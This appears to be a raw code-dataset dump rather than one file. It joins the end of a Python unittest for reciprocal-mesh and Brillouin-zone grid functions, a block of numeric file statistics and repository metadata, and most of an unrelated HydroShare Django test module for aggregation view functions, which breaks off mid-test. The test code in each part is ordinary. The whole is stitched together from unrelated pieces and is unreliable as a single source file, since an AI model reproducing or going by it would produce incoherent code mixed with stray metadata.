                #     print("%4d %3d %3d %3d" % (gp, ga[0], ga[1], ga[2]))
                # print("")
                data = np.loadtxt(StringIO(result_ir_rec_mesh_distortion[j]),
                                  dtype='intc')
                np.testing.assert_equal(data[:, 0], mapping_table)
                np.testing.assert_equal(data[:, 1:4], grid_address)
                j += 1

    def test_relocate_BZ_grid_address(self):
        for i, (cell, mesh, grid_address) in enumerate(
                zip(self.cells, self.meshes, self.grid_addresses)):
            # cell[0] holds the lattice; its inverse is the reciprocal lattice
            # form expected by relocate_BZ_grid_address.
            reclat = np.linalg.inv(cell[0])
            bz_grid_address, bz_map = relocate_BZ_grid_address(
                grid_address,
                mesh,
                reclat)
            data = np.loadtxt(StringIO(result_bz_grid_address[i]),
                              dtype='intc')
            np.testing.assert_equal(data, bz_grid_address)
            # NOTE(review): the comprehension reuses the name 'i'; safe in
            # Python 3 (comprehensions have their own scope) but confusing.
            data = [int(i) for i in result_bz_map[i].split()]
            np.testing.assert_equal(data, bz_map)
            # for i in range(len(bz_map) // 10):
            #     print(("%3d " * 10) % tuple(bz_map[i * 10: (i + 1) * 10]))
            # n = len(bz_map) % 10
            # print(("%3d " * n) % tuple(bz_map[-n:]))

    def test_get_grid_points_and_bz_grid_points_by_rotations(self):
        # Expected grid-point indices for grid address [1, 1, 1] under each
        # rotation, for the plain grid (data) and the BZ-relocated grid (data_bz).
        data = [[21, 31, 61, 55, 31, 61, 55, 21, 55, 21, 31, 61,
                 61, 55, 21, 31, 61, 55, 21, 31, 55, 21, 31, 61,
                 21, 31, 61, 55, 31, 61, 55, 21, 55, 21, 31, 61,
                 61, 55, 21, 31, 61, 55, 21, 31, 55, 21, 31, 61],
                [21, 30, 25, 31, 22, 27, 31, 22, 27, 21, 30, 25]]
        data_bz = [[21, 31, 61, 55, 31, 61, 55, 21, 55, 21, 31, 61,
                    61, 55, 21, 31, 61, 55, 21, 31, 55, 21, 31, 61,
                    21, 31, 61, 55, 31, 61, 55, 21, 55, 21, 31, 61,
                    61, 55, 21, 31, 61, 55, 21, 31, 55, 21, 31, 61],
                   [21, 30, 25, 31, 22, 27, 56, 43, 52, 42, 55, 48]]
        for i, (cell, mesh, grid_address, rotations) in enumerate(
                zip(self.cells, self.meshes, self.grid_addresses,
                    self.rotations)):
            # Reciprocal-space rotations are the transposes of the real-space ones.
            rec_rots = [r.T for r in rotations]
            gps = get_grid_points_by_rotations([1, 1, 1],
                                               rec_rots,
                                               mesh)
            # print(", ".join(["%d" % g for g in gps]))
            np.testing.assert_equal(data[i], gps)
            bz_grid_address, bz_map = relocate_BZ_grid_address(
                grid_address,
                mesh,
                np.linalg.inv(cell[0]))
            bz_gps = get_BZ_grid_points_by_rotations([1, 1, 1],
                                                     rec_rots,
                                                     mesh,
                                                     bz_map)
            # print(", ".join(["%d" % g for g in bz_gps]))
            np.testing.assert_equal(data_bz[i], bz_gps)
            # The relocated addresses may differ from the originals only by
            # whole mesh periods.
            diff_address = bz_grid_address[:len(grid_address)] - grid_address
            np.testing.assert_equal(diff_address % mesh, 0)
if __name__ == '__main__':
    # Run this module's test case directly with verbose output.
    suite = unittest.TestLoader().loadTestsFromTestCase(TestReciprocalMesh)
    unittest.TextTestRunner(verbosity=2).run(suite)
    # unittest.main()
| 24.243942
| 79
| 0.38542
| 3,010
| 15,007
| 1.854485
| 0.077741
| 0.276603
| 0.305804
| 0.335364
| 0.706736
| 0.662487
| 0.566822
| 0.525797
| 0.51254
| 0.51254
| 0
| 0.370161
| 0.493969
| 15,007
| 618
| 80
| 24.283172
| 0.364893
| 0.032918
| 0
| 0.417808
| 0
| 0
| 0.605214
| 0
| 0
| 0
| 0
| 0
| 0.018836
| 1
| 0.011986
| false
| 0.001712
| 0.013699
| 0
| 0.027397
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c3cba330c0b4fb63a472a308d1547372d2b8779a
| 93,518
|
py
|
Python
|
hs_file_types/tests/test_view_functions.py
|
tommac7/hydroshare
|
87c4543a55f98103d2614bf4c47f7904c3f9c029
|
[
"BSD-3-Clause"
] | null | null | null |
hs_file_types/tests/test_view_functions.py
|
tommac7/hydroshare
|
87c4543a55f98103d2614bf4c47f7904c3f9c029
|
[
"BSD-3-Clause"
] | null | null | null |
hs_file_types/tests/test_view_functions.py
|
tommac7/hydroshare
|
87c4543a55f98103d2614bf4c47f7904c3f9c029
|
[
"BSD-3-Clause"
] | null | null | null |
import json
from django.test import TestCase, RequestFactory
from django.contrib.auth.models import Group
from django.core.urlresolvers import reverse
from rest_framework import status
from hs_core import hydroshare
from hs_core.models import ResourceFile
from hs_core.testing import MockIRODSTestCaseMixin
from hs_file_types.views import set_file_type, add_metadata_element, update_metadata_element, \
update_key_value_metadata, delete_key_value_metadata, add_keyword_metadata, \
delete_keyword_metadata, update_netcdf_file, update_dataset_name, update_refts_abstract, \
update_sqlite_file, update_timeseries_abstract, get_timeseries_metadata, remove_aggregation, \
delete_coverage_element, update_aggregation_coverage, move_aggregation, delete_aggregation
from hs_file_types.models import GeoRasterLogicalFile, NetCDFLogicalFile, NetCDFFileMetaData, \
RefTimeseriesLogicalFile, TimeSeriesLogicalFile, GenericLogicalFile, FileSetLogicalFile
from hs_file_types.tests.utils import CompositeResourceTestMixin
class TestFileTypeViewFunctions(MockIRODSTestCaseMixin, TestCase, CompositeResourceTestMixin):
    def setUp(self):
        """Create a test user and record the fixture-file paths used by the tests."""
        super(TestFileTypeViewFunctions, self).setUp()
        self.group, _ = Group.objects.get_or_create(name='Hydroshare Author')
        self.username = 'john'
        self.password = 'jhmypassword'
        self.user = hydroshare.create_account(
            'john@gmail.com',
            username=self.username,
            first_name='John',
            last_name='Clarson',
            superuser=False,
            password=self.password,
            groups=[]
        )
        self.res_title = 'Test Raster File Type'
        self.factory = RequestFactory()
        # One fixture file per aggregation (file) type exercised by the tests.
        self.raster_file_name = 'small_logan.tif'
        self.raster_file = 'hs_file_types/tests/{}'.format(self.raster_file_name)
        self.netcdf_file_name = 'netcdf_valid.nc'
        self.netcdf_file = 'hs_file_types/tests/{}'.format(self.netcdf_file_name)
        self.refts_file_name = 'multi_sites_formatted_version1.0.refts.json'
        self.refts_file = 'hs_file_types/tests/{}'.format(self.refts_file_name)
        # Variant of the refts fixture whose title field is null.
        missing_title_refts_json_file = 'refts_valid_title_null.refts.json'
        self.refts_missing_title_file_name = missing_title_refts_json_file
        self.refts_missing_title_file = 'hs_file_types/tests/{}'.format(
            self.refts_missing_title_file_name)
        self.sqlite_file_name = 'ODM2_Multi_Site_One_Variable.sqlite'
        # NOTE: the sqlite fixture lives under tests/data/, unlike the others.
        self.sqlite_file = 'hs_file_types/tests/data/{}'.format(self.sqlite_file_name)
        self.text_file_name = 'generic_file.txt'
        self.text_file = 'hs_file_types/tests/{}'.format(self.text_file_name)
def test_create_raster_aggregation_from_file(self):
    """Setting a valid tif file to GeoRaster file type (with metadata extraction)
    via the set_file_type view should succeed."""
    self.create_composite_resource(file_to_upload=self.raster_file)
    self.assertEqual(self.composite_resource.files.all().count(), 1)
    tif_res_file = self.composite_resource.files.first()
    # the uploaded file must not belong to any aggregation yet
    self.assertEqual(tif_res_file.has_logical_file, False)
    url_kwargs = {'resource_id': self.composite_resource.short_id,
                  'file_id': tif_res_file.id,
                  'hs_file_type': 'GeoRaster'}
    request = self.factory.post(reverse('set_file_type', kwargs=url_kwargs))
    request.user = self.user
    # call the view function under test
    response = set_file_type(request, resource_id=self.composite_resource.short_id,
                             file_id=tif_res_file.id, hs_file_type='GeoRaster')
    self.assertEqual(response.status_code, status.HTTP_201_CREATED)
    # 2 files now - the system generated a vrt file
    self.assertEqual(self.composite_resource.files.all().count(), 2)
    tif_res_file = self.composite_resource.files.first()
    self.assertEqual(tif_res_file.logical_file_type_name, "GeoRasterLogicalFile")
    self.composite_resource.delete()
def test_create_raster_aggregation_from_folder(self):
    """Setting a folder containing a valid tif file to GeoRaster file type
    (with metadata extraction) via the set_file_type view should succeed."""
    self.create_composite_resource()
    # create a folder and put the tif file into it
    raster_folder = 'raster_folder'
    ResourceFile.create_folder(self.composite_resource, raster_folder)
    self.add_file_to_resource(file_to_add=self.raster_file, upload_folder=raster_folder)
    self.assertEqual(self.composite_resource.files.all().count(), 1)
    tif_res_file = self.composite_resource.files.first()
    self.assertNotEqual(tif_res_file.file_folder, None)
    # the uploaded file must not belong to any aggregation yet
    self.assertEqual(tif_res_file.has_logical_file, False)
    url_kwargs = {'resource_id': self.composite_resource.short_id,
                  'hs_file_type': 'GeoRaster'}
    url = reverse('set_file_type', kwargs=url_kwargs)
    request = self.factory.post(url, data={'folder_path': tif_res_file.file_folder})
    request.user = self.user
    # call the view function under test
    response = set_file_type(request, resource_id=self.composite_resource.short_id,
                             file_id=tif_res_file.id, hs_file_type='GeoRaster')
    self.assertEqual(response.status_code, status.HTTP_201_CREATED)
    # 2 files now - the system generated a vrt file
    self.assertEqual(self.composite_resource.files.all().count(), 2)
    tif_res_file = self.composite_resource.files.first()
    self.assertEqual(tif_res_file.logical_file_type_name, "GeoRasterLogicalFile")
    self.composite_resource.delete()
def test_create_netcdf_aggregation_from_file(self):
    """Setting a valid netcdf file to NetCDF file type (with metadata extraction)
    via the set_file_type view should succeed."""
    self.create_composite_resource(file_to_upload=self.netcdf_file)
    self.assertEqual(self.composite_resource.files.all().count(), 1)
    nc_res_file = self.composite_resource.files.first()
    # the uploaded file must not belong to any aggregation yet
    self.assertEqual(nc_res_file.has_logical_file, False)
    url_kwargs = {'resource_id': self.composite_resource.short_id,
                  'file_id': nc_res_file.id,
                  'hs_file_type': 'NetCDF'}
    request = self.factory.post(reverse('set_file_type', kwargs=url_kwargs))
    request.user = self.user
    # call the view function under test
    response = set_file_type(request, resource_id=self.composite_resource.short_id,
                             file_id=nc_res_file.id, hs_file_type='NetCDF')
    self.assertEqual(response.status_code, status.HTTP_201_CREATED)
    # 2 files now - an extra file was generated by the system
    self.assertEqual(self.composite_resource.files.all().count(), 2)
    nc_res_file = self.composite_resource.files.first()
    self.assertEqual(nc_res_file.logical_file_type_name, "NetCDFLogicalFile")
    self.composite_resource.delete()
def test_create_netcdf_aggregation_from_folder(self):
    """Setting a folder containing a valid netcdf file to NetCDF file type
    (with metadata extraction) via the set_file_type view should succeed."""
    self.create_composite_resource()
    # create a folder and put the nc file into it
    nc_folder = 'netcdf_folder'
    ResourceFile.create_folder(self.composite_resource, nc_folder)
    self.add_file_to_resource(file_to_add=self.netcdf_file, upload_folder=nc_folder)
    self.assertEqual(self.composite_resource.files.all().count(), 1)
    nc_res_file = self.composite_resource.files.first()
    # the uploaded file must not belong to any aggregation yet
    self.assertEqual(nc_res_file.has_logical_file, False)
    url_kwargs = {'resource_id': self.composite_resource.short_id,
                  'hs_file_type': 'NetCDF'}
    url = reverse('set_file_type', kwargs=url_kwargs)
    request = self.factory.post(url, data={'folder_path': nc_res_file.file_folder})
    request.user = self.user
    # call the view function under test
    response = set_file_type(request, resource_id=self.composite_resource.short_id,
                             file_id=nc_res_file.id, hs_file_type='NetCDF')
    self.assertEqual(response.status_code, status.HTTP_201_CREATED)
    # 2 files now - an extra file was generated by the system
    self.assertEqual(self.composite_resource.files.all().count(), 2)
    nc_res_file = self.composite_resource.files.first()
    self.assertEqual(nc_res_file.logical_file_type_name, "NetCDFLogicalFile")
    self.composite_resource.delete()
def test_create_timeseries_aggregation_from_file(self):
    """Setting a valid sqlite file to TimeSeries file type (with metadata
    extraction) via the set_file_type view should succeed."""
    self.create_composite_resource(file_to_upload=self.sqlite_file)
    self.assertEqual(self.composite_resource.files.all().count(), 1)
    sqlite_res_file = self.composite_resource.files.first()
    # the uploaded file must not belong to any aggregation yet
    self.assertEqual(sqlite_res_file.has_logical_file, False)
    url_kwargs = {'resource_id': self.composite_resource.short_id,
                  'file_id': sqlite_res_file.id,
                  'hs_file_type': 'TimeSeries'}
    request = self.factory.post(reverse('set_file_type', kwargs=url_kwargs))
    request.user = self.user
    # call the view function under test
    response = set_file_type(request, resource_id=self.composite_resource.short_id,
                             file_id=sqlite_res_file.id, hs_file_type='TimeSeries')
    self.assertEqual(response.status_code, status.HTTP_201_CREATED)
    # still just the one (sqlite) file
    self.assertEqual(self.composite_resource.files.all().count(), 1)
    sqlite_res_file = self.composite_resource.files.first()
    self.assertEqual(sqlite_res_file.logical_file_type_name, "TimeSeriesLogicalFile")
    self.composite_resource.delete()
def test_create_timeseries_aggregation_from_folder(self):
    """Setting a folder containing a valid sqlite file to TimeSeries file type
    (with metadata extraction) via the set_file_type view should succeed."""
    self.create_composite_resource()
    # create a folder and put the sqlite file into it
    ts_folder = 'timeseries_folder'
    ResourceFile.create_folder(self.composite_resource, ts_folder)
    self.add_file_to_resource(file_to_add=self.sqlite_file, upload_folder=ts_folder)
    self.assertEqual(self.composite_resource.files.all().count(), 1)
    sqlite_res_file = self.composite_resource.files.first()
    # the uploaded file must not belong to any aggregation yet
    self.assertEqual(sqlite_res_file.has_logical_file, False)
    url_kwargs = {'resource_id': self.composite_resource.short_id,
                  'hs_file_type': 'TimeSeries'}
    url = reverse('set_file_type', kwargs=url_kwargs)
    request = self.factory.post(url, data={'folder_path': sqlite_res_file.file_folder})
    request.user = self.user
    # call the view function under test
    response = set_file_type(request, resource_id=self.composite_resource.short_id,
                             file_id=sqlite_res_file.id, hs_file_type='TimeSeries')
    self.assertEqual(response.status_code, status.HTTP_201_CREATED)
    # still just the one (sqlite) file
    self.assertEqual(self.composite_resource.files.all().count(), 1)
    sqlite_res_file = self.composite_resource.files.first()
    self.assertEqual(sqlite_res_file.logical_file_type_name, "TimeSeriesLogicalFile")
    self.composite_resource.delete()
def test_create_fileset_aggregation(self):
    """Setting a folder to FileSet aggregation type via the set_file_type view
    should succeed."""
    self.create_composite_resource()
    # create a folder and put a text file into it
    fs_folder = 'fileset_folder'
    ResourceFile.create_folder(self.composite_resource, fs_folder)
    self.add_file_to_resource(file_to_add=self.text_file, upload_folder=fs_folder)
    self.assertEqual(self.composite_resource.files.all().count(), 1)
    txt_res_file = self.composite_resource.files.first()
    # the uploaded file must not belong to any aggregation yet
    self.assertEqual(txt_res_file.has_logical_file, False)
    url_kwargs = {'resource_id': self.composite_resource.short_id,
                  'hs_file_type': 'FileSet'}
    url = reverse('set_file_type', kwargs=url_kwargs)
    request = self.factory.post(url, data={'folder_path': txt_res_file.file_folder})
    request.user = self.user
    # call the view function under test
    response = set_file_type(request, resource_id=self.composite_resource.short_id,
                             hs_file_type='FileSet')
    self.assertEqual(response.status_code, status.HTTP_201_CREATED)
    # still just the one file
    self.assertEqual(self.composite_resource.files.all().count(), 1)
    txt_res_file = self.composite_resource.files.first()
    self.assertEqual(txt_res_file.logical_file_type_name, "FileSetLogicalFile")
    self.composite_resource.delete()
def test_remove_aggregation(self):
    """Test the remove_aggregation view function - removing a netcdf aggregation
    must delete the logical file and its metadata but keep the resource files
    and their folder."""
    self.create_composite_resource()
    new_folder = 'my_folder'
    ResourceFile.create_folder(self.composite_resource, new_folder)
    # add the nc file to the resource at the above folder
    self.add_file_to_resource(file_to_add=self.netcdf_file, upload_folder=new_folder)
    self.assertEqual(self.composite_resource.files.all().count(), 1)
    res_file = self.composite_resource.files.first()
    expected_file_folder = res_file.file_folder
    # set the nc file to NetCDFLogicalFile (aggregation)
    NetCDFLogicalFile.set_file_type(self.composite_resource, self.user, res_file.id)
    # test that we have one logical file of type NetCDFLogicalFile
    self.assertEqual(NetCDFLogicalFile.objects.count(), 1)
    self.assertEqual(NetCDFFileMetaData.objects.count(), 1)
    logical_file = NetCDFLogicalFile.objects.first()
    self.assertEqual(logical_file.files.all().count(), 2)
    self.assertEqual(self.composite_resource.files.all().count(), 2)
    url_params = {'resource_id': self.composite_resource.short_id,
                  'file_type_id': logical_file.id,
                  'hs_file_type': 'NetCDFLogicalFile'
                  }
    url = reverse('remove_aggregation', kwargs=url_params)
    request = self.factory.post(url)
    request.user = self.user
    # this is the view function we are testing
    response = remove_aggregation(request, resource_id=self.composite_resource.short_id,
                                  file_type_id=logical_file.id,
                                  hs_file_type='NetCDFLogicalFile')
    self.assertEqual(response.status_code, status.HTTP_200_OK)
    # test there is no NetCDFLogicalFile object
    self.assertEqual(NetCDFLogicalFile.objects.count(), 0)
    # test there is no NetCDFFileMetaData object
    self.assertEqual(NetCDFFileMetaData.objects.count(), 0)
    # check the files associated with the aggregation not deleted
    self.assertEqual(self.composite_resource.files.all().count(), 2)
    # check the file folder is not deleted
    for f in self.composite_resource.files.all():
        self.assertEqual(f.file_folder, expected_file_folder)
    self.composite_resource.delete()
def test_delete_aggregation(self):
    """Test the delete_aggregation view function - deleting a netcdf aggregation
    must delete the logical file, its metadata, and all its resource files."""
    self.create_composite_resource()
    # add the nc file to the resource at the root
    self.add_file_to_resource(file_to_add=self.netcdf_file)
    self.assertEqual(self.composite_resource.files.all().count(), 1)
    res_file = self.composite_resource.files.first()
    # set the nc file to NetCDFLogicalFile (aggregation)
    NetCDFLogicalFile.set_file_type(self.composite_resource, self.user, res_file.id)
    # test that we have one logical file of type NetCDFLogicalFile
    self.assertEqual(NetCDFLogicalFile.objects.count(), 1)
    self.assertEqual(NetCDFFileMetaData.objects.count(), 1)
    logical_file = NetCDFLogicalFile.objects.first()
    self.assertEqual(logical_file.files.all().count(), 2)
    self.assertEqual(self.composite_resource.files.all().count(), 2)
    url_params = {'resource_id': self.composite_resource.short_id,
                  'file_type_id': logical_file.id,
                  'hs_file_type': 'NetCDFLogicalFile'
                  }
    url = reverse('delete_aggregation', kwargs=url_params)
    request = self.factory.post(url)
    request.user = self.user
    # this is the view function we are testing
    response = delete_aggregation(request, resource_id=self.composite_resource.short_id,
                                  file_type_id=logical_file.id,
                                  hs_file_type='NetCDFLogicalFile')
    self.assertEqual(response.status_code, status.HTTP_200_OK)
    # test there is no NetCDFLogicalFile object
    self.assertEqual(NetCDFLogicalFile.objects.count(), 0)
    # test there is no NetCDFFileMetaData object
    self.assertEqual(NetCDFFileMetaData.objects.count(), 0)
    # check the files are deleted
    self.assertEqual(self.composite_resource.files.all().count(), 0)
    self.composite_resource.delete()
def test_move_aggregation(self):
    """Test the move_aggregation view function - moving a netcdf aggregation from
    one folder to a sibling folder keeps the aggregation and its files intact."""
    self.create_composite_resource()
    new_folder = 'my_folder'
    tgt_folder = 'moved_folder'
    ResourceFile.create_folder(self.composite_resource, new_folder)
    ResourceFile.create_folder(self.composite_resource, tgt_folder)
    # add the nc file to the resource at the above folder
    self.add_file_to_resource(file_to_add=self.netcdf_file, upload_folder=new_folder)
    self.assertEqual(self.composite_resource.files.all().count(), 1)
    res_file = self.composite_resource.files.first()
    # set the nc file to NetCDFLogicalFile (aggregation)
    NetCDFLogicalFile.set_file_type(self.composite_resource, self.user, res_file.id)
    # test that we have one logical file of type NetCDFLogicalFile
    self.assertEqual(NetCDFLogicalFile.objects.count(), 1)
    self.assertEqual(NetCDFFileMetaData.objects.count(), 1)
    logical_file = NetCDFLogicalFile.objects.first()
    self.assertEqual(logical_file.files.all().count(), 2)
    self.assertEqual(self.composite_resource.files.all().count(), 2)
    url_params = {'resource_id': self.composite_resource.short_id,
                  'file_type_id': logical_file.id,
                  'hs_file_type': 'NetCDFLogicalFile',
                  'tgt_path': tgt_folder
                  }
    url = reverse('move_aggregation', kwargs=url_params)
    request = self.factory.post(url)
    request.user = self.user
    # this is the view function we are testing
    response = move_aggregation(request, resource_id=self.composite_resource.short_id,
                                file_type_id=logical_file.id,
                                hs_file_type='NetCDFLogicalFile', tgt_path=tgt_folder)
    self.assertEqual(response.status_code, status.HTTP_200_OK)
    # the aggregation and its metadata must survive the move
    self.assertEqual(NetCDFLogicalFile.objects.count(), 1)
    self.assertEqual(NetCDFFileMetaData.objects.count(), 1)
    # check the files associated with the aggregation not deleted
    self.assertEqual(self.composite_resource.files.all().count(), 2)
    # check the file folder is now tgt_folder
    for f in self.composite_resource.files.all():
        self.assertEqual(f.file_folder, tgt_folder)
    self.composite_resource.delete()
def test_move_aggregation_nested(self):
    """Test the move_aggregation view function - moving a netcdf aggregation into
    a nested sub folder keeps the aggregation and its files intact."""
    self.create_composite_resource()
    new_folder = 'my_folder'
    tgt_folder = 'my_folder/moved_folder'
    ResourceFile.create_folder(self.composite_resource, new_folder)
    ResourceFile.create_folder(self.composite_resource, tgt_folder)
    # add the nc file to the resource at the above folder
    self.add_file_to_resource(file_to_add=self.netcdf_file, upload_folder=new_folder)
    self.assertEqual(self.composite_resource.files.all().count(), 1)
    res_file = self.composite_resource.files.first()
    # set the nc file to NetCDFLogicalFile (aggregation)
    NetCDFLogicalFile.set_file_type(self.composite_resource, self.user, res_file.id)
    # test that we have one logical file of type NetCDFLogicalFile
    self.assertEqual(NetCDFLogicalFile.objects.count(), 1)
    self.assertEqual(NetCDFFileMetaData.objects.count(), 1)
    logical_file = NetCDFLogicalFile.objects.first()
    self.assertEqual(logical_file.files.all().count(), 2)
    self.assertEqual(self.composite_resource.files.all().count(), 2)
    url_params = {'resource_id': self.composite_resource.short_id,
                  'file_type_id': logical_file.id,
                  'hs_file_type': 'NetCDFLogicalFile',
                  'tgt_path': tgt_folder
                  }
    url = reverse('move_aggregation', kwargs=url_params)
    request = self.factory.post(url)
    request.user = self.user
    # this is the view function we are testing
    response = move_aggregation(request, resource_id=self.composite_resource.short_id,
                                file_type_id=logical_file.id,
                                hs_file_type='NetCDFLogicalFile', tgt_path=tgt_folder)
    self.assertEqual(response.status_code, status.HTTP_200_OK)
    # the aggregation and its metadata must survive the move
    self.assertEqual(NetCDFLogicalFile.objects.count(), 1)
    self.assertEqual(NetCDFFileMetaData.objects.count(), 1)
    # check the files associated with the aggregation not deleted
    self.assertEqual(self.composite_resource.files.all().count(), 2)
    # check the file folder is now tgt_folder
    for f in self.composite_resource.files.all():
        self.assertEqual(f.file_folder, tgt_folder)
    self.composite_resource.delete()
def test_move_aggregation_root(self):
    """Test the move_aggregation view function - moving a netcdf aggregation from
    the resource root into a folder keeps the aggregation and its files intact."""
    self.create_composite_resource()
    new_folder = ''
    tgt_folder = 'moved_folder'
    ResourceFile.create_folder(self.composite_resource, tgt_folder)
    # add the nc file to the resource at the root (empty upload folder)
    self.add_file_to_resource(file_to_add=self.netcdf_file, upload_folder=new_folder)
    self.assertEqual(self.composite_resource.files.all().count(), 1)
    res_file = self.composite_resource.files.first()
    # set the nc file to NetCDFLogicalFile (aggregation)
    NetCDFLogicalFile.set_file_type(self.composite_resource, self.user, res_file.id)
    # test that we have one logical file of type NetCDFLogicalFile
    self.assertEqual(NetCDFLogicalFile.objects.count(), 1)
    self.assertEqual(NetCDFFileMetaData.objects.count(), 1)
    logical_file = NetCDFLogicalFile.objects.first()
    self.assertEqual(logical_file.files.all().count(), 2)
    self.assertEqual(self.composite_resource.files.all().count(), 2)
    url_params = {'resource_id': self.composite_resource.short_id,
                  'file_type_id': logical_file.id,
                  'hs_file_type': 'NetCDFLogicalFile',
                  'tgt_path': tgt_folder
                  }
    url = reverse('move_aggregation', kwargs=url_params)
    request = self.factory.post(url)
    request.user = self.user
    # this is the view function we are testing
    response = move_aggregation(request, resource_id=self.composite_resource.short_id,
                                file_type_id=logical_file.id,
                                hs_file_type='NetCDFLogicalFile', tgt_path=tgt_folder)
    self.assertEqual(response.status_code, status.HTTP_200_OK)
    # the aggregation and its metadata must survive the move
    self.assertEqual(NetCDFLogicalFile.objects.count(), 1)
    self.assertEqual(NetCDFFileMetaData.objects.count(), 1)
    # check the files associated with the aggregation not deleted
    self.assertEqual(self.composite_resource.files.all().count(), 2)
    # check the file folder is now tgt_folder
    for f in self.composite_resource.files.all():
        self.assertEqual(f.file_folder, tgt_folder)
    self.composite_resource.delete()
def test_move_aggregation_to_root(self):
    """Test the move_aggregation view function - with no tgt_path, a netcdf
    aggregation moves to the resource root and stays intact."""
    self.create_composite_resource()
    new_folder = 'new_folder'
    ResourceFile.create_folder(self.composite_resource, new_folder)
    # add the nc file to the resource at the above folder
    self.add_file_to_resource(file_to_add=self.netcdf_file, upload_folder=new_folder)
    self.assertEqual(self.composite_resource.files.all().count(), 1)
    res_file = self.composite_resource.files.first()
    # set the nc file to NetCDFLogicalFile (aggregation)
    NetCDFLogicalFile.set_file_type(self.composite_resource, self.user, res_file.id)
    # test that we have one logical file of type NetCDFLogicalFile
    self.assertEqual(NetCDFLogicalFile.objects.count(), 1)
    self.assertEqual(NetCDFFileMetaData.objects.count(), 1)
    logical_file = NetCDFLogicalFile.objects.first()
    self.assertEqual(logical_file.files.all().count(), 2)
    self.assertEqual(self.composite_resource.files.all().count(), 2)
    url_params = {'resource_id': self.composite_resource.short_id,
                  'file_type_id': logical_file.id,
                  'hs_file_type': 'NetCDFLogicalFile'
                  }
    url = reverse('move_aggregation', kwargs=url_params)
    request = self.factory.post(url)
    request.user = self.user
    # this is the view function we are testing - omitting tgt_path moves to root
    response = move_aggregation(request, resource_id=self.composite_resource.short_id,
                                file_type_id=logical_file.id,
                                hs_file_type='NetCDFLogicalFile')
    self.assertEqual(response.status_code, status.HTTP_200_OK)
    # the aggregation and its metadata must survive the move
    self.assertEqual(NetCDFLogicalFile.objects.count(), 1)
    self.assertEqual(NetCDFFileMetaData.objects.count(), 1)
    # check the files associated with the aggregation not deleted
    self.assertEqual(self.composite_resource.files.all().count(), 2)
    # check the files are now at the resource root (no folder)
    for f in self.composite_resource.files.all():
        self.assertEqual(f.file_folder, None)
    self.composite_resource.delete()
def test_add_update_single_file_aggregation_metadata(self):
    """Test the add_metadata_element and update_metadata_element views for a
    single file aggregation (temporal coverage element)."""
    self.create_composite_resource(file_to_upload=self.text_file)
    res_file = self.composite_resource.files.first()
    # make the text file a GenericLogicalFile (single file) aggregation
    GenericLogicalFile.set_file_type(self.composite_resource, self.user, res_file.id)
    res_file = self.composite_resource.files.first()
    logical_file = res_file.logical_file
    self.assertEqual(res_file.logical_file_type_name, "GenericLogicalFile")
    # the aggregation starts without a temporal coverage element
    self.assertEqual(logical_file.metadata.temporal_coverage, None)
    url_kwargs = {'hs_file_type': 'GenericLogicalFile',
                  'file_type_id': logical_file.id,
                  'element_name': 'coverage'}
    add_url = reverse('add_file_metadata', kwargs=url_kwargs)
    request = self.factory.post(add_url, data={'start': '1/1/2010', 'end': '12/12/2015'})
    request.user = self.user
    # view under test: add the temporal coverage element
    response = add_metadata_element(request, hs_file_type="GenericLogicalFile",
                                    file_type_id=logical_file.id, element_name='coverage')
    self.assertEqual(response.status_code, status.HTTP_200_OK)
    self.assertEqual('success', json.loads(response.content)['status'])
    # the aggregation now has a temporal coverage element
    self.assertNotEqual(logical_file.metadata.temporal_coverage, None)
    # view under test: update the temporal coverage element
    url_kwargs['element_id'] = logical_file.metadata.temporal_coverage.id
    update_url = reverse('update_file_metadata', kwargs=url_kwargs)
    request = self.factory.post(update_url, data={'start': '1/1/2011', 'end': '12/12/2016'})
    request.user = self.user
    response = update_metadata_element(request, hs_file_type="GenericLogicalFile",
                                       file_type_id=logical_file.id, element_name='coverage',
                                       element_id=logical_file.metadata.temporal_coverage.id)
    self.assertEqual(response.status_code, status.HTTP_200_OK)
    self.assertEqual('success', json.loads(response.content)['status'])
    temporal_coverage = logical_file.metadata.temporal_coverage
    self.assertEqual(temporal_coverage.value['start'], '2011-01-01')
    self.assertEqual(temporal_coverage.value['end'], '2016-12-12')
    self.composite_resource.delete()
def test_add_update_file_set_aggregation_metadata(self):
    """Test the add_metadata_element and update_metadata_element views for a
    file set aggregation (temporal coverage element)."""
    self.create_composite_resource()
    # create a folder, put a text file into it, and make the folder a file set
    fs_folder = 'fileset_folder'
    ResourceFile.create_folder(self.composite_resource, fs_folder)
    self.add_file_to_resource(file_to_add=self.text_file, upload_folder=fs_folder)
    self.assertEqual(self.composite_resource.files.all().count(), 1)
    # no file set aggregation before setting the folder's type
    self.assertEqual(FileSetLogicalFile.objects.count(), 0)
    FileSetLogicalFile.set_file_type(self.composite_resource, self.user, folder_path=fs_folder)
    # exactly one file set aggregation now
    self.assertEqual(FileSetLogicalFile.objects.count(), 1)
    logical_file = FileSetLogicalFile.objects.first()
    # the aggregation starts without a temporal coverage element
    self.assertEqual(logical_file.metadata.temporal_coverage, None)
    url_kwargs = {'hs_file_type': 'FileSetLogicalFile',
                  'file_type_id': logical_file.id,
                  'element_name': 'coverage'}
    add_url = reverse('add_file_metadata', kwargs=url_kwargs)
    request = self.factory.post(add_url, data={'start': '1/1/2010', 'end': '12/12/2015'})
    request.user = self.user
    # view under test: add the temporal coverage element
    response = add_metadata_element(request, hs_file_type="FileSetLogicalFile",
                                    file_type_id=logical_file.id, element_name='coverage')
    self.assertEqual(response.status_code, status.HTTP_200_OK)
    self.assertEqual('success', json.loads(response.content)['status'])
    # the file set aggregation now has a temporal coverage element
    self.assertNotEqual(logical_file.metadata.temporal_coverage, None)
    # view under test: update the temporal coverage element
    url_kwargs['element_id'] = logical_file.metadata.temporal_coverage.id
    update_url = reverse('update_file_metadata', kwargs=url_kwargs)
    request = self.factory.post(update_url, data={'start': '1/1/2011', 'end': '12/12/2016'})
    request.user = self.user
    response = update_metadata_element(request, hs_file_type="FileSetLogicalFile",
                                       file_type_id=logical_file.id, element_name='coverage',
                                       element_id=logical_file.metadata.temporal_coverage.id)
    self.assertEqual(response.status_code, status.HTTP_200_OK)
    self.assertEqual('success', json.loads(response.content)['status'])
    temporal_coverage = logical_file.metadata.temporal_coverage
    self.assertEqual(temporal_coverage.value['start'], '2011-01-01')
